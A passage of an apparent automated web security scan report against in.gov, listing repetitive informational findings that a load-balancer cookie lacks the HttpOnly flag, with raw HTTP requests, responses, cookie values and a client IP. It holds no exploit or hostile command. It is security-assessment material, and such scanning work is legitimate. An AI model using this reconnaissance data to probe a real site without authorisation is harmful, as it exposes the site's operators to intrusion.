HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:15 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 18:40:28 GMT
ETag: "cd33f1-3ae-4856475e4df00"
Accept-Ranges: bytes
Content-Length: 942
Content-Type: image/png
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:15 GMT; path=/

.PNG
.
...IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...PIDATx...KH.Q....{.6:..E...I.\.=.XHH.C.U...Y.P.......v..hQ..Q...z@..B0..h..|.=:..|....8..9.w...s..(..v......E.L.by.@..........
...[SNIP]...

14.354. http://in.gov/core/images/online_services_icon-over.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/online_services_icon-over.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/online_services_icon-over.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:32 GMT
Server: Apache
Last-Modified: Fri, 30 Apr 2010 20:25:22 GMT
ETag: "cd33f2-1990-4857a0ae31080"
Accept-Ranges: bytes
Content-Length: 6544
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:32 GMT; path=/

GIF89ak.k..........Zm...................w~.Re|m~......................CZtat....]p.y........}...........s................................................3V+Ec.........Vi.......
)N............0Ih.......
...[SNIP]...

14.355. http://in.gov/core/images/online_services_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/online_services_icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/online_services_icon.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:16 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 13:38:36 GMT
ETag: "4de52a-1950-483918ffc0f00"
Accept-Ranges: bytes
Content-Length: 6480
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:16 GMT; path=/

GIF89ak.k....hy..........Laz.........*Ed........................k|.......F\v.....................\m.......|...6X......    (M............bt.^q.....................................fx.............p.........
...[SNIP]...

14.356. http://in.gov/core/images/page_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/page_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/page_bg.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:09 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 13:15:20 GMT
ETag: "ec2ba9-278-483913cc6ca00"
Accept-Ranges: bytes
Content-Length: 632
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:09 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ...........
...[SNIP]...

14.357. http://in.gov/core/images/prev.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/prev.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/prev.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:15 GMT
Server: Apache
Last-Modified: Mon, 12 Apr 2010 19:29:42 GMT
ETag: "4de531-2ee-4840f2aa9f580"
Accept-Ranges: bytes
Content-Length: 750
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:15 GMT; path=/

GIF89a.....z.p..........................q................................as....}.....|..~.....z..k{............................r................................bs....}...........v.....................
...[SNIP]...

14.358. http://in.gov/core/images/prev.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/prev.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/prev.png HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:15 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 18:40:28 GMT
ETag: "cd33f0-3c5-4856475e4df00"
Accept-Ranges: bytes
Content-Length: 965
Content-Type: image/png
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:15 GMT; path=/

.PNG
.
...IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...gIDATx..UKh.A.}=3=..I......?...9......x......=...(.....=.!.z.QA<hT....H..QDQ.1d.&...I.kU...!9......W..^..0......{........... ..
...[SNIP]...

14.359. http://in.gov/core/images/search_button-new2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/search_button-new2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/search_button-new2.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:20 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 15:22:45 GMT
ETag: "10218db-40a-495697a6e5b40"
Accept-Ranges: bytes
Content-Length: 1034
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:20 GMT; path=/

GIF89a2...........{.................Md~.............;].............Ih.................R......-Hhl...................=Vs|..>Wt.....................Ne}.....\q.........................................
...[SNIP]...

14.360. http://in.gov/core/images/search_button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/search_button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/search_button.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000; WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127021784:ss=1304126855900

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:30:01 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 13:48:02 GMT
ETag: "11848b-1d5-48391b1b88880"
Accept-Ranges: bytes
Content-Length: 469
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:31:01 GMT; path=/

GIF89a<...............<]......?Xt..._t..../Ji..R...o.....Of........!G.......................................!.......,....<......`1.di.h..e.Pp,.tm.8..y.....H,......l...(.*.M....7c...D.J!4$..0v.D(...L.
...[SNIP]...

14.361. http://in.gov/core/images/searchfield_bg-new2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/searchfield_bg-new2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/searchfield_bg-new2.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:19 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 15:21:52 GMT
ETag: "10218dc-4ef-495697745a400"
Accept-Ranges: bytes
Content-Length: 1263
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:19 GMT; path=/

GIF89a.................................................................................................................................................................................................
...[SNIP]...

14.362. http://in.gov/core/images/sos.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/sos.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/sos.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:18 GMT
Server: Apache
Last-Modified: Mon, 03 Jan 2011 13:05:10 GMT
ETag: "784200-1164-498f0cd40ed80"
Accept-Ranges: bytes
Content-Length: 4452
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:18 GMT; path=/

GIF89ai._...iE5...........x...V7&...5o....^.................&'5.rk.......eOqRE...57I.zl.......M6...................YB.|`............qks..u......NFH........#..c>+....gG.xU.....g..x.......dWO+.#.....1
...[SNIP]...

14.363. http://in.gov/core/images/subscribe_button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/subscribe_button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/subscribe_button.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:34 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 14:08:28 GMT
ETag: "4de52d-6cc-48391facbcf00"
Accept-Ranges: bytes
Content-Length: 1740
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:34 GMT; path=/

GIF89aP.......?j..9....../]..Q..E.......o..Ov........(.Ld...._...........bw.m..d|....9Q.^v.?V.Me.AX....5L.=T.i..Qi.G^....fy.H`.......bz.|..'?./G.Kc....Md.AX.{.....z...2.......x..BZ.....0.Yq.G^.[s.l..
...[SNIP]...

14.364. http://in.gov/core/images/tab_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/tab_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/tab_bg.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:30 GMT
Server: Apache
Last-Modified: Fri, 16 Apr 2010 14:50:06 GMT
ETag: "118485-ab-4845bba1a0380"
Accept-Ranges: bytes
Content-Length: 171
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:30 GMT; path=/

GIF89a..<....................................................................................................!.......,......<...(..@.g......8.$.e7T.EH.+.`&p).0..@.d.....;

14.365. http://in.gov/core/images/tab_left.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/tab_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/tab_left.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:31 GMT
Server: Apache
Last-Modified: Fri, 16 Apr 2010 14:56:29 GMT
ETag: "118486-1e1-4845bd0ee2140"
Accept-Ranges: bytes
Content-Length: 481
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:31 GMT; path=/

GIF89a
.<...............................................................................................................................................................................................
...[SNIP]...

14.366. http://in.gov/core/images/tab_right.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/tab_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/tab_right.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:30 GMT
Server: Apache
Last-Modified: Fri, 16 Apr 2010 14:56:29 GMT
ETag: "118487-1e1-4845bd0ee2140"
Accept-Ranges: bytes
Content-Length: 481
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:30 GMT; path=/

GIF89a
.<...............................................................................................................................................................................................
...[SNIP]...

14.367. http://in.gov/core/images/topnav_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/topnav_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/topnav_bg.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:09 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 13:21:55 GMT
ETag: "ec2baf-198-48391545202c0"
Accept-Ranges: bytes
Content-Length: 408
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:09 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ......C....
...[SNIP]...

14.368. http://in.gov/core/images/topnav_left.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/topnav_left.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/topnav_left.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:20 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 16:41:39 GMT
ETag: "ec2bb0-344-483941e9f56c0"
Accept-Ranges: bytes
Content-Length: 836
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:20 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ......C.
..
...[SNIP]...

14.369. http://in.gov/core/images/topnav_right.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/topnav_right.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/topnav_right.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:20 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 16:41:39 GMT
ETag: "ec2bb1-2b0-483941e9f56c0"
Accept-Ranges: bytes
Content-Length: 688
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:20 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ......C.
..
...[SNIP]...

14.370. http://in.gov/core/index_pages/quicklinks.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/index_pages/quicklinks.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/index_pages/quicklinks.html HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:35:49 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 2974
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:36:49 GMT; path=/

<div id="twocolumn"> <span class="breadcrumbs"><a href="/core/index.html" title="Home">Home</a> &gt; QuickLinks</span><span class="subscribe"><a href="javascript:window.open('/core/subscriptions_ql.ht
...[SNIP]...

14.371. http://in.gov/core/index_pages/void()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/index_pages/void()

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/index_pages/void() HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:21:07 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:07 GMT; path=/
Content-Length: 191344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...

14.372. http://in.gov/core/js/_arss.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/_arss.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/_arss.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:05 GMT
Server: Apache
Last-Modified: Mon, 07 Jun 2010 21:32:32 GMT
ETag: "3e9f97-6af8-4887769103c00"
Accept-Ranges: bytes
Content-Length: 27384
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:05 GMT; path=/

/**
*
* Copyright (c) 2007, RightNow Technologies, Inc
*
* All rights reserved.
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that
...[SNIP]...

14.373. http://in.gov/core/js/agency.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/agency.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/agency.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:56 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 20:37:32 GMT
ETag: "3e9f8c-34b2-487995c1d1b00"
Accept-Ranges: bytes
Content-Length: 13490
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
